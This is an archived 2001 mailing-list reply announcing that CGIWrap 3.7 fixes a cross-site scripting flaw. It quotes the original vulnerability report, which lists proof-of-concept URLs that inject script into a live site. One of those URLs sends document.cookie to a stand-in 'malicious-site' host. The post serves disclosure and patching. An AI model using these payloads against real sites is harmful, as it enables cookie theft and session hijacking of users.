Re: [cgiwrap-users] Re: Security hole in CGIWrap (cross-site scripting vulnerability)

From: Nathan Neulinger (nneulat_private)
Date: Sun Jul 22 2001 - 10:39:03 PDT

Next message: Thomas Roessler: "Re: URGENT SECURITY ADVISORY FOR SSH SECURE SHELL 3.0.0"

Previous message: aleph1at_private: "Administrivia: Code Red"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

The following cross-site scripting vulnerability was reported in
cgiwrap. This has just been corrected in version 3.7 which has just been
released.

http://prdownloads.sourceforge.net/cgiwrap/cgiwrap-3.7.tar.gz

All error message output is now html encoded to prevent this problem.

-- Nathan

> "TAKAGI, Hiromitsu" wrote:
> >
> > Hi,
> >
> > I found a cross-site scripting vulnerability in CGIWrap.  Cookies
> > issued by the server on which CGIWrap is installed can be stolen.
> >
> > Please try to access the following URLs.
> >
> > Confirming the bug:
> >   http://www.unixtools.org/cgi-bin/cgiwrap/%3CS%3E
> >   http://www.unixtools.org/cgi-bin/cgiwrap/>
> >   http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/>TEST</S>
> > JavaScript code will be executed:
> >   http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/>alert(document.domain)</SCRIPT>
> >   http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/>document.write(document.domain)</SCRIPT>
> >   http://www.unixtools.org/cgi-bin/cgiwrap/)>
> > Stealing your Cookies issued by www.unixtools.org, if any:
> >   http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/>window.open("http://malicious-site/save.cgi%3F"+escape(document.cookie))</SCRIPT>
> >
<snip>
> >
> > Regards,
> > --
> > Hiromitsu Takagi, Ph.D.
> > National Institute of Advanced Industrial Science and Technology,
> > Tsukuba Central 2, 1-1-1, Umezono, Tsukuba, Ibaraki 305-8568, Japan
> > http://www.etl.go.jp/~takagi/
> 
> _______________________________________________
> cgiwrap-users mailing list
> cgiwrap-usersat_private
> http://lists.sourceforge.net/lists/listinfo/cgiwrap-users

-- 


------------------------------------------------------------
Nathan Neulinger                       EMail:  nneulat_private
University of Missouri - Rolla         Phone: (573) 341-4841
CIS - Systems Programming                Fax: (573) 341-4216

Next message: Thomas Roessler: "Re: URGENT SECURITY ADVISORY FOR SSH SECURE SHELL 3.0.0"
Previous message: aleph1at_private: "Administrivia: Code Red"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Jul 23 2001 - 08:25:41 PDT